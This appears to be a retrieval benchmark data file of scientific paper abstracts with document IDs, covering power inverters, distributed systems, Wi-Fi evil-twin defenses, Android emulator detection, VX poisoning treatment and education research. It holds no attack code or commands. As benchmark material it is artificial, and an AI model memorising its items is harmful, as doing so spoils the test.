"text": "The increasing integration of decentralized electrical sources is attended by problems with power quality, safe grid operation and grid stability. The concept of the Virtual Synchronous Machine (VISMA) [1] discribes an inverter to particularly connect renewable electrical sources to the grid that provides a wide variety of static an dynamic properties they are also suitable to achieve typical transient and oscillation phenomena in decentralized as well as weak grids. Furthermore in static operation, power plant controlled VISMA systems are capable to cope with critical surplus production of renewable electrical energy without additional communication systems only conducted by the grid frequency. This paper presents the dynamic properties \"damping\" and \"virtual mass\" of the VISMA and their contribution to the stabilization of the grid frequency and the attenuation of grid oscillations examined in an experimental grid set.",
"title": ""
},
{
"docid": "1e5e001871d20eae3f0c3d7f1acfd98d",
"text": "In this paper, a novel type auxiliary active resonant capacitor snubber assisted zero current soft switching pulse modulation single-ended push pull (SEPP) series load resonant inverter with two auxiliary resonant lossless inductor snubbers is proposed for consumer high-frequency induction heating (IH) appliances. Its operating principle in steady state is described by using each mode equivalent circuits. The new multi resonant high-frequency inverter can regulate its output power under a condition of a constant frequency zero current soft switching (ZCS) commutation principle on the basis of asymmetrical PWM control scheme. The consumer brand-new IH products using proposed ZCS-PWM series load resonant SEPP high-frequency inverter is evaluated and discussed as compared with conventional high-frequency inverter on the basis of experimental results. In order to extend ZCS operation ranges under a low power setting PWM, the pulse density modulation (PDM) strategy is demonstrated for high frequency multi resonant inverter. Its practical effectiveness is substantially proved from an application point of view",
"title": ""
},
{
"docid": "12866e003093bc7d89d751697f2be93c",
"text": "We argue that the right way to understand distributed protocols is by considering how messages change the state of knowledge of a system. We present a hierarchy of knowledge states that a system may be in, and discuss how communication can move the system's state of knowledge of a fact up the hierarchy. Of special interest is the notion of common knowledge. Common knowledge is an essential state of knowledge for reaching agreements and coordinating action. We show that in practical distributed systems, common knowledge is not attainable. We introduce various relaxations of common knowledge that are attainable in many cases of interest. We describe in what sense these notions are appropriate, and discuss their relationship to each other. We conclude with a discussion of the role of knowledge in distributed systems.",
"title": ""
},
{
"docid": "83f45a393c3e8bfbcfd8ddda39ca44c8",
"text": "Open-access 802.11 wireless networks are commonly deployed in cafes, bookstores, and other public spaces to provide free Internet connectivity. These networks are convenient to deploy, requiring no out-of-band key exchange or prior trust relationships. However, such networks are vulnerable to a variety of threats including the evil twin attack where an adversary clones a client's previously-used access point for a variety of malicious purposes including malware injection or identity theft. We propose defenses that aim to maintain the simplicity, convenience, and usability of open-access networks while offering increased protection from evil twin attacks. First, we present an evil twin detection strategy called context-leashing that constrains access point trust by location. Second, we propose that wireless networks be identified by uncertified public keys and design an SSH-style authentication and session key establishment protocol that fits into the 802.1X standard. Lastly, to mitigate the pitfalls of SSH-style authentication, we present a crowd-sourcing-based reporting protocol that provides historical information for access point public keys while preserving the location privacy of users who contribute reports.",
"title": ""
},
{
"docid": "72b25e72706720f71ebd6fe8cf769df5",
"text": "This paper reports our recent result in designing a function for autonomous APs to estimate throughput and delay of its clients in 2.4GHz WiFi channels to support those APs' dynamic channel selection. Our function takes as inputs the traffic volume and strength of signals emitted from nearby interference APs as well as the target AP's traffic volume. By this function, the target AP can estimate throughput and delay of its clients without actually moving to each channel, it is just required to monitor IEEE802.11 MAC frames sent or received by the interference APs. The function is composed of an SVM-based classifier to estimate capacity saturation and a regression function to estimate both throughput and delay in case of saturation in the target channel. The training dataset for the machine learning is created by a highly-precise network simulator. We have conducted over 10,000 simulations to train the model, and evaluated using additional 2,000 simulation results. The result shows that the estimated throughput error is less than 10%.",
"title": ""
},
{
"docid": "6358eb0078470ef55647184763ba1ccf",
"text": "In this review the application of deep learning for medical diagnosis is addressed. A thorough analysis of various scientific articles in the domain of deep neural networks application in the medical field has been conducted. More than 300 research articles were obtained, and after several selection steps, 46 articles were presented in more detail. The results indicate that convolutional neural networks (CNN) are the most widely represented when it comes to deep learning and medical image analysis. Furthermore, based on the findings of this article, it can be noted that the application of deep learning technology is widespread, but the majority of applications are focused on bioinformatics, medical diagnosis and other similar fields.",
"title": ""
},
{
"docid": "05b4df16c35a89ee2a5b9ac482e0a297",
"text": "Intensity-based classification of MR images has proven problematic, even when advanced techniques are used. Intrascan and interscan intensity inhomogeneities are a common source of difficulty. While reported methods have had some success in correcting intrascan inhomogeneities, such methods require supervision for the individual scan. This paper describes a new method called adaptive segmentation that uses knowledge of tissue intensity properties and intensity inhomogeneities to correct and segment MR images. Use of the expectation-maximization (EM) algorithm leads to a method that allows for more accurate segmentation of tissue types as well as better visualization of magnetic resonance imaging (MRI) data, that has proven to be effective in a study that includes more than 1000 brain scans. Implementation and results are described for segmenting the brain in the following types of images: axial (dual-echo spin-echo), coronal [three dimensional Fourier transform (3-DFT) gradient-echo T1-weighted] all using a conventional head coil, and a sagittal section acquired using a surface coil. The accuracy of adaptive segmentation was found to be comparable with manual segmentation, and closer to manual segmentation than supervised multivariant classification while segmenting gray and white matter.",
"title": ""
},
{
"docid": "fd14310dd9a039175c075059e4ed31e4",
"text": "A new self-reconfigurable robot is presented. The robot is a hybrid chain/lattice design with several novel features. An active mechanical docking mechanism provides inter-module connection, along with optical and electrical interface. The docking mechanisms function additionally as driven wheels. Internal slip rings provide unlimited rotary motion to the wheels, allowing the modules to move independently by driving on flat surfaces, or in assemblies negotiating more complex terrain. Modules in the system are mechanically homogeneous, with three identical docking mechanisms within a module. Each mechanical dock is driven by a high torque actuator to enable movement of large segments within a multi-module structure, as well as low-speed driving. Preliminary experimental results demonstrate locomotion, mechanical docking, and lifting of a single module.",
"title": ""
},
{
"docid": "158c535b44fe81ca7194d5a0b386f2b5",
"text": "Deep networks are increasingly being applied to problems involving image synthesis, e.g., generating images from textual descriptions and reconstructing an input image from a compact representation. Supervised training of image-synthesis networks typically uses a pixel-wise loss (PL) to indicate the mismatch between a generated image and its corresponding target image. We propose instead to use a loss function that is better calibrated to human perceptual judgments of image quality: the multiscale structural-similarity score (MS-SSIM) [1]. Because MS-SSIM is differentiable, it is easily incorporated into gradient-descent learning. We compare the consequences of using MS-SSIM versus PL loss on training autoencoders. Human observers reliably prefer images synthesized by MS-SSIM-optimized models over those synthesized by PL-optimized models, for two distinct PL measures (L1 and L2 distances). We also explore the effect of training objective on image encoding and analyze conditions under which perceptually-optimized representations yield better performance on image classification. Finally, we demonstrate the superiority of perceptually-optimized networks for super-resolution imaging. We argue that significant advances can be made in modeling images through the use of training objectives that are well aligned to characteristics of human perception.",
"title": ""
},
{
"docid": "097cab15476b850df18e625530c25821",
"text": "The Internet of Things (IoT) has been growing in recent years with the improvements in several different applications in the military, marine, intelligent transportation, smart health, smart grid, smart home and smart city domains. Although IoT brings significant advantages over traditional information and communication (ICT) technologies for Intelligent Transportation Systems (ITS), these applications are still very rare. Although there is a continuous improvement in road and vehicle safety, as well as improvements in IoT, the road traffic accidents have been increasing over the last decades. Therefore, it is necessary to find an effective way to reduce the frequency and severity of traffic accidents. Hence, this paper presents an intelligent traffic accident detection system in which vehicles exchange their microscopic vehicle variables with each other. The proposed system uses simulated data collected from vehicular ad-hoc networks (VANETs) based on the speeds and coordinates of the vehicles and then, it sends traffic alerts to the drivers. Furthermore, it shows how machine learning methods can be exploited to detect accidents on freeways in ITS. It is shown that if position and velocity values of every vehicle are given, vehicles' behavior could be analyzed and accidents can be detected easily. Supervised machine learning algorithms such as Artificial Neural Networks (ANN), Support Vector Machine (SVM), and Random Forests (RF) are implemented on traffic data to develop a model to distinguish accident cases from normal cases. The performance of RF algorithm, in terms of its accuracy, was found superior to ANN and SVM algorithms. RF algorithm has showed better performance with 91.56% accuracy than SVM with 88.71% and ANN with 90.02% accuracy.",
"title": ""
},
{
"docid": "2bb0681d393aa600854d66253a43e10b",
"text": "Traditional i-vector speaker recognition systems use a Gaussian mixture model (GMM) to collect sufficient statistics. Recently, replacing this GMM with a deep neural network (DNN) has shown promising results. In this paper, we study a number of open issues that relate to performance, computational complexity, and applicability of DNNs as part of the full speaker recognition pipeline. The experimental validation is performed on the female part of the SRE12 telephone condition 2, where our DNN-based system produces the best published results. The insights gained by our study indicate that, for the purpose of speaker recognition, not using fMLLR speaker adaptation and early stopping of the DNN training allow significant computational reduction without sacrificing performance. Also, using a full covariance universal background model (UBM) and a large set of senones produces important performance gains. Finally, the DNN-based approach does not exhibit a strong language dependence as a DNN trained on Spanish data outperforms the conventional GMM-based system on our English task.",
"title": ""
},
{
"docid": "5184c27b7387a0cbedb1c3a393f797fa",
"text": "Emulator-based dynamic analysis has been widely deployed in Android application stores. While it has been proven effective in vetting applications on a large scale, it can be detected and evaded by recent Android malware strains that carry detection heuristics. Using such heuristics, an application can check the presence or contents of certain artifacts and infer the presence of emulators. However, there exists little work that systematically discovers those heuristics that would be eventually helpful to prevent malicious applications from bypassing emulator-based analysis. To cope with this challenge, we propose a framework called Morpheus that automatically generates such heuristics. Morpheus leverages our insight that an effective detection heuristic must exploit discrepancies observable by an application. To this end, Morpheus analyzes the application sandbox and retrieves observable artifacts from both Android emulators and real devices. Afterwards, Morpheus further analyzes the retrieved artifacts to extract and rank detection heuristics. The evaluation of our proof-of-concept implementation of Morpheus reveals more than 10,000 novel detection heuristics that can be utilized to detect existing emulator-based malware analysis tools. We also discuss the discrepancies in Android emulators and potential countermeasures.",
"title": ""
},
{
"docid": "8d50065318c1df7c687db28c9894dcb4",
"text": "This paper describes a method for synthesizing images that match the texture appearanceof a given digitized sample. This synthesis is completely automatic and requires only the “target” texture as input. It allows generation of as much texture as desired so that any object can be covered. It can be used to produce solid textures for creating textured 3-d objects without the distortions inherent in texture mapping. It can also be used to synthesize texture mixtures, images that look a bit like each of several digitized samples. The approach is based on a model of human texture perception, and has potential to be a practically useful tool for graphics applications.",
"title": ""
},
{
"docid": "d07d6fe33b01fbfb21ba5adc76ec786f",
"text": "Dunaliella salina (Dunal) Teod, a unicellular eukaryotic green alga, is a highly salt-tolerant organism. To identify novel genes with potential roles in salinity tolerance, a salt stress-induced D. salina cDNA library was screened based on the expression in Haematococcus pluvialis, an alga also from Volvocales but one that is hypersensitive to salt. Five novel salt-tolerant clones were obtained from the library. Among them, Ds-26-16 and Ds-A3-3 contained the same open reading frame (ORF) and encoded a 6.1 kDa protein. Transgenic tobacco overexpressing Ds-26-16 and Ds-A3-3 exhibited increased leaf area, stem height, root length, total chlorophyll, and glucose content, but decreased proline content, peroxidase activity, and ascorbate content, and enhanced transcript level of Na+/H+ antiporter salt overly sensitive 1 gene (NtSOS1) expression, compared to those in the control plants under salt condition, indicating that Ds-26-16 enhanced the salt tolerance of tobacco plants. The transcript of Ds-26-16 in D. salina was upregulated in response to salt stress. The expression of Ds-26-16 in Escherichia coli showed that the ORF contained the functional region and changed the protein(s) expression profile. A mass spectrometry assay suggested that the most abundant and smallest protein that changed is possibly a DNA-binding protein or Cold shock-like protein. Subcellular localization analysis revealed that Ds-26-16 was located in the nuclei of onion epidermal cells or nucleoid of E. coli cells. In addition, the possible use of shoots regenerated from leaf discs to quantify the salt tolerance of the transgene at the initial stage of tobacco transformation was also discussed.",
"title": ""
},
{
"docid": "49c7d088e4122831eddfe864a44b69ca",
"text": "Common approaches to multi-label classification learn independent classifiers for each category, and employ ranking or thresholding schemes for classification. Because they do not exploit dependencies between labels, such techniques are only well-suited to problems in which categories are independent. However, in many domains labels are highly interdependent. This paper explores multi-label conditional random field (CRF)classification models that directly parameterize label co-occurrences in multi-label classification. Experiments show that the models outperform their single-label counterparts on standard text corpora. Even when multi-labels are sparse, the models improve subset classification error by as much as 40%.",
"title": ""
},
{
"docid": "1053653b3584180dd6f97866c13ce40a",
"text": "• • The order of authorship on this paper is random and contributions were equal. We would like to thank Ron Burt, Jim March and Mike Tushman for many helpful suggestions. Olav Sorenson provided particularly extensive comments on this paper. We would like to acknowledge the financial support of the University of Chicago, Graduate School of Business and a grant from the Kauffman Center for Entrepreneurial Leadership. Clarifying the relationship between organizational aging and innovation processes is an important step in understanding the dynamics of high-technology industries, as well as for resolving debates in organizational theory about the effects of aging on organizational functioning. We argue that aging has two seemingly contradictory consequences for organizational innovation. First, we believe that aging is associated with increases in firms' rates of innovation. Simultaneously, however, we argue that the difficulties of keeping pace with incessant external developments causes firms' innovative outputs to become obsolete relative to the most current environmental demands. These seemingly contradictory outcomes are intimately related and reflect inherent trade-offs in organizational learning and innovation processes. Multiple longitudinal analyses of the relationship between firm age and patenting behavior in the semiconductor and biotechnology industries lend support to these arguments. Introduction In an increasingly knowledge-based economy, pinpointing the factors that shape the ability of organizations to produce influential ideas and innovations is a central issue for organizational studies. Among all organizational outputs, innovation is fundamental not only because of its direct impact on the viability of firms, but also because of its profound effects on the paths of social and economic change. In this paper, we focus on an ubiquitous organizational process-aging-and examine its multifaceted influence on organizational innovation. In so doing, we address an important unresolved issue in organizational theory, namely the nature of the relationship between aging and organizational behavior (Hannan 1998). Evidence clarifying the relationship between organizational aging and innovation promises to improve our understanding of the organizational dynamics of high-technology markets, and in particular the dynamics of technological leadership. For instance, consider the possibility that aging has uniformly positive consequences for innovative activity: on the foundation of accumulated experience, older firms innovate more frequently, and their innovations have greater significance than those of younger enterprises. In this scenario, technological change paradoxically may be associated with organizational stability, as incumbent organizations come to dominate the technological frontier and their preeminence only increases with their tenure. 1 Now consider the …",
"title": ""
},
{
"docid": "d5d789344f9678ce4d6a9e9646c908c8",
"text": "The nerve agent VX is most likely to enter the body via liquid contamination of the skin. After percutaneous exposure, the slow uptake into the blood, and its slow elimination result in toxic levels in plasma for a period of several hours. Consequently, this has implications for the development of toxic signs and for treatment onset. In the present study, clinical signs, toxicokinetics and effects on respiration, electroencephalogram and heart rate were investigated in hairless guinea pigs after percutaneous exposure to 500 microg/kg VX. We found that full inhibition of AChE and partial inhibition of BuChE in blood were accompanied by the onset of clinical signs, reflected by a decline in respiratory minute volume, bronchoconstriction and a decrease in heart rate. Furthermore, we investigated the therapeutic efficacy of a single dose of atropine, obidoxime and diazepam, administered at appearance of first clinical signs, versus that of repetitive dosing of these drugs on the reappearance of signs. A single shot treatment extended the period to detrimental physiological decline and death for several hours, whereas repetitive administration remained effective as long as treatment was continued. In conclusion, percutaneous VX poisoning showed to be effectively treatable when diagnosed on time and when continued over the entire period of time during which VX, in case of ineffective decontamination, penetrates the skin.",
"title": ""
},
{
"docid": "bcb615f8bfe9b2b13a4bfe72b698e4c7",
"text": "is granted to distribute this article for nonprofit, educational purposes if it is copied in its entirety and the journal is credited. PARE has the right to authorize third party reproduction of this article in print, electronic and database forms. Researchers occasionally have to work with an extremely small sample size, defined herein as N ≤ 5. Some methodologists have cautioned against using the t-test when the sample size is extremely small, whereas others have suggested that using the t-test is feasible in such a case. The present simulation study estimated the Type I error rate and statistical power of the one-and two-sample t-tests for normally distributed populations and for various distortions such as unequal sample sizes, unequal variances, the combination of unequal sample sizes and unequal variances, and a lognormal population distribution. Ns per group were varied between 2 and 5. Results show that the t-test provides Type I error rates close to the 5% nominal value in most of the cases, and that acceptable power (i.e., 80%) is reached only if the effect size is very large. This study also investigated the behavior of the Welch test and a rank-transformation prior to conducting the t-test (t-testR). Compared to the regular t-test, the Welch test tends to reduce statistical power and the t-testR yields false positive rates that deviate from 5%. This study further shows that a paired t-test is feasible with extremely small Ns if the within-pair correlation is high. It is concluded that there are no principal objections to using a t-test with Ns as small as 2. A final cautionary note is made on the credibility of research findings when sample sizes are small. The dictum \" more is better \" certainly applies to statistical inference. According to the law of large numbers, a larger sample size implies that confidence intervals are narrower and that more reliable conclusions can be reached. The reality is that researchers are usually far from the ideal \" mega-trial \" performed with 10,000 subjects (cf. Ioannidis, 2013) and will have to work with much smaller samples instead. For a variety of reasons, such as budget, time, or ethical constraints, it may not be possible to gather a large sample. In some fields of science, such as research on rare animal species, persons having a rare illness, or prodigies scoring at the extreme of an ability distribution (e.g., Ruthsatz & Urbach, 2012), …",
"title": ""
},
{
"docid": "6ae5f96cd14df30e7ac5cc6b654823df",
"text": "A succession of doctrines for enhancing cybersecurity has been advocated in the past, including prevention, risk management, and deterrence through accountability. None has proved effective. Proposals that are now being made view cybersecurity as a public good and adopt mechanisms inspired by those used for public health. This essay discusses the failings of previous doctrines and surveys the landscape of cybersecurity through the lens that a new doctrine, public cybersecurity, provides.",
"title": ""
},
{
"docid": "0c2d3216e8040d3182d6e23a1b5c0425",
"text": "This study examined how students’ achievement goals, self-efficacy and learning strategies influenced their choice of an online, hybrid or traditional learning environment. One hundred thirty-two post-secondary students completed surveys soliciting their preferences for learning environments, reasons for their preference, their motivational orientation towards learning and learning strategies used. Findings indicated that most students preferred traditional learning environments. This preference was based on how well the environment matched their personal learning style and engaged them as students. Discriminant analyses indicated significant differences in motivational beliefs and learning strategies; students who preferred traditional environments showed a mastery goal orientation and greater willingness to apply effort while learning. Students who preferred less traditional environments presented as more confident that they could manage a non-traditional class. These findings have implications for understanding students’ motivation for learning in diverse educational settings. Introduction One of the profound impacts of technological innovations in education is that of offering undergraduate and graduate classes online (Allen et al, 2004). Online education is Portions of this research were presented at the International Association for Development of the Information Society (IADIS) International Conference on Cognition and Exploratory Learning in Digital Age (CELDA), Freiburg, Germany, October 2008. British Journal of Educational Technology Vol 41 No 3 2010 349–364 doi:10.1111/j.1467-8535.2009.00993.x © 2009 The Authors. Journal compilation © 2009 Becta. Published by Blackwell Publishing, 9600 Garsington Road, Oxford OX4 2DQ, UK and 350 Main Street, Malden, MA 02148, USA. similar to other forms of e-learning, such as hybrid or blended courses (face-to-face instruction with online learning), in that all use the Internet and communication technologies to teach students who are not in the same physical location (TallentRunnels et al, 2006). This situation is clearly distinguished from more traditional learning environments in which no technological mediation of communication between teacher and students is required (see Berge & Collins, 1995; Hiltz, 1994; Kuehn, 1994; Tallent-Runnels et al). Research pertaining to why students may prefer an online education environment versus a more traditional classroom is notably sparse. Findings within the motivation literature, as related to education, have suggested that contributors to students’ learning preferences include their goals for learning (Ames, 1992), their self-efficacy or perceived competence in learning (Bandura, 1997) and their specific strategies for learning (Pintrich, Wolters & Baxter, 2000). However, explication of how students’ motivational beliefs and learning strategies influence their choice of learning environment when an online component is introduced is lacking. This lack is notable given current trends in higher education course offerings. This study was designed to address this gap and examined factors that contributed to individuals’ choice of a particular type of learning environment be it online exclusively, hybrid or traditional in nature. Learners’ motivation has been consistently linked to successful learning. For example, Galusha (1997) noted that knowledge about students’ motivation may help educators determine which students are likely to participate in and benefit from online education. Similarly, Tallent-Runnels et al (2006) asserted that an understanding of learners’ motivation is the key for effective instructional design. However, we know little about the motivational beliefs and learning strategies of online education learners. We do know that within traditional settings, students’ ability to sustain or increase their willingness to engage in and complete academic activities has been viewed as important for understanding learning and performance (Wolters, 1999). Studies on motivation and learning strategies also have shown that students’ motivational beliefs and learning strategies are related to involvement in learning (eg, Pintrich & Schunk, 2002; Pintrich et al, 2000; Schunk & Pajares, 2002; Zimmerman, 1989). For example, learning among mastery-oriented students results in more analytic processing of the information; students who are performance oriented process information in a more superficial manner (Ames, 1992). Motivation in the present study was defined in terms of achievement goals and selfefficacy. Achievement goals are concerned with the reasons or purposes for engaging in academic-related tasks. According to achievement goal theory, there are two contrasting goals: mastery goals and performance goals that explain the ‘why’ of engaging in academic-related tasks. Mastery goals refer to learners’ desires to increase their knowledge, understanding, competence and appreciation of the educational materials (Ames, 1992). Performance goals are concerned with learners’ desires to outperform others to demonstrate competence (performance approach) or to avoid demonstrating incompetence (performance avoidance) (Elliot & Church, 1997; Middleton & Midgley, 1997). A mastery goal is concerned with improving one’s competence. Individuals who hold 350 British Journal of Educational Technology Vol 41 No 3 2010 © 2009 The Authors. Journal compilation © 2009 Becta. mastery goals engage in learning to develop new skills and acquire knowledge (Ames). As such, these students are intrinsically motivated, exert greater effort in their learning, and use effective and varied learning strategies (Ames & Archer, 1988; Dweck & Leggett, 1988). In contrast, students holding performance goals (approach or avoidance) are concerned with outperforming others and how they are perceived by others. These students are often less engaged in their learning, avoid challenges and are usually extrinsically motivated (Ames & Archer; Dweck & Leggett). Self-efficacy is another motivational construct that has ramifications for learning. Specifically, self-efficacy refers to students’ perceptions about their ability to complete a specific task (Bandura, 1986, 1997). An established finding is that self-efficacy is a strong predictor of academic performance and course satisfaction in traditional classrooms. Findings also show that students with high academic self-efficacy are more flexible in their use of learning strategies than those with low academic self-efficacy (Bandura, 1997). How students use learning strategies is part of what is referred to as self-regulated learning (Pintrich et al, 2000), which concerns students’ use of cognitive strategies and metacognition. Strategies of self-regulated learning have been categorised into cognitive engagement, metacognitive strategies and resource management (Pintrich & Garcia, 1994). Cognitive engagement refers to the mental effort students invest in monitoring their comprehension of new material (Corno & Mandinach, 1983). Metacognitive knowledge pertains to students’ knowledge of themselves as learners, strategies to use for different tasks and when to use these strategies (Pintrich et al; Schneider & Pressley, 1997). Resource management refers to the behavioural component of selfregulated learning and entails using techniques such as time management. Overall, self-regulated learners are proactive and persistent in their learning (Schunk & Zimmerman, 1994), as they show proficiency monitoring and modifying their strategies to achieve their goals (Zimmerman, 1989). Similarly, they show adaptive motivational beliefs and attitudes that are likely to lead to successful learning. Clearly, motivational beliefs and learning strategies influence academic outcomes. However, research addressing learners’ motivation and learning strategies in the selection of a particular learning environment remains limited. In fact, from a motivational perspective, little is known about the type of students who are attracted to certain learning environments and why. Accordingly, this study examined the types of motivation and learning strategies reported by undergraduate and postgraduate students who preferred either online, hybrid or traditional classroom environments and their reasons for those preferences.",
"title": ""
}
] | scidocsrr |
d5df5c5860f3efe0efcaf7769609f2bb | Modeling and Analysis of a Dual-Active-Bridge-Isolated Bidirectional DC/DC Converter to Minimize RMS Current With Whole Operating Range | [
{
"docid": "a1332b94cf217fec5e3a51fe45b9ed4e",
"text": "There is large voltage deviation on the dc bus of the three-stage solid-state transformer (SST) when the load suddenly changes. The feed-forward control can effectively reduce the voltage deviation and transition time. However, conventional power feed-forward scheme of SST cannot develop the feed-forward control to the full without extra current sensor. In this letter, an energy feed-forward scheme, which takes the energy changes of inductors into consideration, is proposed for the dual active bridge (DAB) controller. A direct feed-forward scheme, which directly passes the power of DAB converter to the rectifier stage, is proposed for the rectifier controller. They can further improve the dynamic performances of the two dc bus voltages, respectively. The experimental results in a 2-kW SST prototype are provided to verify the proposed feed-forward schemes and show the superior performances.",
"title": ""
},
{
"docid": "c1a5e168f3260e70dd105310cd3fc13a",
"text": "To reduce current stress and improve efficiency of dual active bridge (DAB) dc-dc converters, various control schemes have been proposed in recent decades. Most control schemes for directly minimizing power losses from power loss modeling analysis and optimization aspect of the adopted converter are too difficult and complicated to implement in real-time digital microcontrollers. Thus, this paper focuses on a simple solution to reduce current stress and improve the efficiency of the adopted DAB converter. However, traditional current-stress-optimized (CSO) schemes have some drawbacks, such as inductance dependency and an additional load-current sensor. In this paper, a simple CSO scheme with a unified phase-shift (UPS) control, which can be equivalent to the existing conventional phase-shift controls, is proposed for DAB dc-dc converters to realize current stress optimization. The simple CSO scheme can overcome those drawbacks of traditional CSO schemes, gain the minimum current stress, and improve efficiency. Then, a comparison of single-phase-shift (SPS) control, simple CSO scheme with dual-phase-shift (CSO-DPS) control, simple CSO scheme with extended-phase-shift (CSO-EPS) control, and simple CSO scheme with UPS (CSO-UPS) control is analyzed in detail. Finally, experimental results verify the excellent performance of the proposed CSO-UPS control scheme and the correctness of theoretical analysis.",
"title": ""
}
] | [
{
"docid": "7635ad3e2ac2f8e72811bf056d29dfbb",
"text": "Nowadays, many consumer videos are captured by portable devices such as iPhone. Different from constrained videos that are produced by professionals, e.g., those for broadcast, summarizing multiple handheld videos from a same scenery is a challenging task. This is because: 1) these videos have dramatic semantic and style variances, making it difficult to extract the representative key frames; 2) the handheld videos are with different degrees of shakiness, but existing summarization techniques cannot alleviate this problem adaptively; and 3) it is difficult to develop a quality model that evaluates a video summary, due to the subjectiveness of video quality assessment. To solve these problems, we propose perceptual multiattribute optimization which jointly refines multiple perceptual attributes (i.e., video aesthetics, coherence, and stability) in a multivideo summarization process. In particular, a weakly supervised learning framework is designed to discover the semantically important regions in each frame. Then, a few key frames are selected based on their contributions to cover the multivideo semantics. Thereafter, a probabilistic model is proposed to dynamically fit the key frames into an aesthetically pleasing video summary, wherein its frames are stabilized adaptively. Experiments on consumer videos taken from sceneries throughout the world demonstrate the descriptiveness, aesthetics, coherence, and stability of the generated summary.",
"title": ""
},
{
"docid": "2cddde920b40a245a5e1b4b1abb2e92b",
"text": "The aim of this research was to understand what affects people's privacy preferences in smartphone apps. We ran a four-week study in the wild with 34 participants. Participants were asked to answer questions, which were used to gather their personal context and to measure their privacy preferences by varying app name and purpose of data collection. Our results show that participants shared the most when no information about data access or purpose was given, and shared the least when both of these details were specified. When just one of either purpose or the requesting app was shown, participants shared less when just the purpose was specified than when just the app name was given. We found that the purpose for data access was the predominant factor affecting users' choices. In our study the purpose condition vary from being not specified, to vague to be very specific. Participants were more willing to disclose data when no purpose was specified. When a vague purpose was shown, participants became more privacy-aware and were less willing to disclose their information. When specific purposes were shown participants were more willing to disclose when the purpose for requesting the information appeared to be beneficial to them, and shared the least when the purpose for data access was solely beneficial to developers.",
"title": ""
},
{
"docid": "432ff163e4dded948aa5a27aa440cd30",
"text": "Eighty-one female and sixty-seven male undergraduates at a Malaysian university, from seven faculties and a Center for Language Studies completed a Computer Self-Efficacy Scale, Computer Anxiety Scale, and an Attitudes toward the Internet Scale and give information about their use of the Internet. This survey research investigated undergraduates’ computer anxiety, computer self-efficacy, and reported use of and attitudes toward the Internet. This study also examined differences in computer anxiety, computer selfefficacy, attitudes toward the Internet and reported use of the Internet for undergraduates with different demographic variables. The findings suggest that the undergraduates had moderate computer anxiousness, medium attitudes toward the Internet, and high computer self-efficacy and used the Internet extensively for educational purposes such as doing research, downloading electronic resources and e-mail communications. This study challenges the long perceived male bias in the computer environment and supports recent studies that have identified greater gender equivalence in interest, use, and skills levels. However, there were differences in undergraduates’ Internet usage levels based on the discipline of study. Furthermore, higher levels of Internet usage did not necessarily translate into better computer self-efficacy among the undergraduates. A more important factor in determining computer self-efficacy could be the discipline of study and undergraduates studying computer related disciplines appeared to have higher self-efficacy towards computers and the Internet. Undergraduates who used the Internet more often may not necessarily feel more comfortable using them. Possibly, other factors such as the types of application used, the purpose for using, and individual satisfaction could also influence computer self-efficacy and computer anxiety. However, although Internet usage levels may not have any impact on computer self-efficacy, higher usage of the Internet does seem to decrease the levels of computer anxiety among the undergraduates. Undergraduates with lower computer anxiousness demonstrated more positive attitudes toward the Internet in this study.",
"title": ""
},
{
"docid": "9b130e155ca93228ed176e5d405fd50a",
"text": "For years educators have attempted to identify the effective predictors of scholastic achievement and several personality variables were described as significantly correlated with grade performance. Since one of the crucial practical implications of identifying the factors involved in academic achievement is to facilitate the teaching-learning process, the main variables that have been associated with achievement should be investigated simultaneously in order to provide information as to their relative merit in the population examined. In contrast with this premise, limited research has been conducted on the importance of personality traits and self-esteem on scholastic achievement. To this aim in a sample of 439 subjects (225 males) with an average age of 12.36 years (SD= .99) from three first level secondary school classes of Southern Italy, personality traits, as defined by the Five Factor Model, self-esteem and socioeconomic status were evaluated. The academic results correlated significantly both with personality traits and with some dimensions of self-esteem. Moreover, hierarchical regression analyses brought to light, in particular, the predictive value of openness to experience on academic marks. The results, stressing the multidimensional nature of academic performance, indicate a need to adopt complex approaches for undertaking action addressing students’ difficulties in attaining good academic achievement.",
"title": ""
},
{
"docid": "7f43ad2fd344aa7260e3af33d3f69e32",
"text": "Charge pump circuits are used for obtaining higher voltages than normal power supply voltage in flash memories, DRAMs and low voltage designs. In this paper, we present a charge pump circuit in standard CMOS technology that is suited for low voltage operation. Our proposed charge pump uses a cross- connected NMOS cell as the basic element and PMOS switches are employed to connect one stage to the next. The simulated output voltages of the proposed 4 stage charge pump for input voltage of 0.9 V, 1.2 V, 1.5 V, 1.8 V and 2.1 V are 3.9 V, 5.1 V, 6.35 V, 7.51 V and 8.4 V respectively. This proposed charge pump is suitable for low power CMOS mixed-mode designs.",
"title": ""
},
{
"docid": "323abed1a623e49db50bed383ab26a92",
"text": "Robust object detection is a critical skill for robotic applications in complex environments like homes and offices. In this paper we propose a method for using multiple cameras to simultaneously view an object from multiple angles and at high resolutions. We show that our probabilistic method for combining the camera views, which can be used with many choices of single-image object detector, can significantly improve accuracy for detecting objects from many viewpoints. We also present our own single-image object detection method that uses large synthetic datasets for training. Using a distributed, parallel learning algorithm, we train from very large datasets (up to 100 million image patches). The resulting object detector achieves high performance on its own, but also benefits substantially from using multiple camera views. Our experimental results validate our system in realistic conditions and demonstrates significant performance gains over using standard single-image classifiers, raising accuracy from 0.86 area-under-curve to 0.97.",
"title": ""
},
{
"docid": "07db8fea11297fea2def9440a7d614dc",
"text": "We present the 2017 Visual Domain Adaptation (VisDA) dataset and challenge, a large-scale testbed for unsupervised domain adaptation across visual domains. Unsupervised domain adaptation aims to solve the real-world problem of domain shift, where machine learning models trained on one domain must be transferred and adapted to a novel visual domain without additional supervision. The VisDA2017 challenge is focused on the simulation-to-reality shift and has two associated tasks: image classification and image segmentation. The goal in both tracks is to first train a model on simulated, synthetic data in the source domain and then adapt it to perform well on real image data in the unlabeled test domain. Our dataset is the largest one to date for cross-domain object classification, with over 280K images across 12 categories in the combined training, validation and testing domains. The image segmentation dataset is also large-scale with over 30K images across 18 categories in the three domains. We compare VisDA to existing cross-domain adaptation datasets and provide a baseline performance analysis, as well as results of the challenge.",
"title": ""
},
{
"docid": "5edc557fbcf1d9a91560739058274900",
"text": "A number of technological advances have led to a renewed interest on dynamic vehicle routing problems. This survey classifies routing problems from the perspective of information quality and evolution. After presenting a general description of dynamic routing, we introduce the notion of degree of dynamism, and present a comprehensive review of applications and solution methods for dynamic vehicle routing problems. ∗Corresponding author: gueret@mines-nantes.fr",
"title": ""
},
{
"docid": "abdd1406266d7290166eb16b8a5045a9",
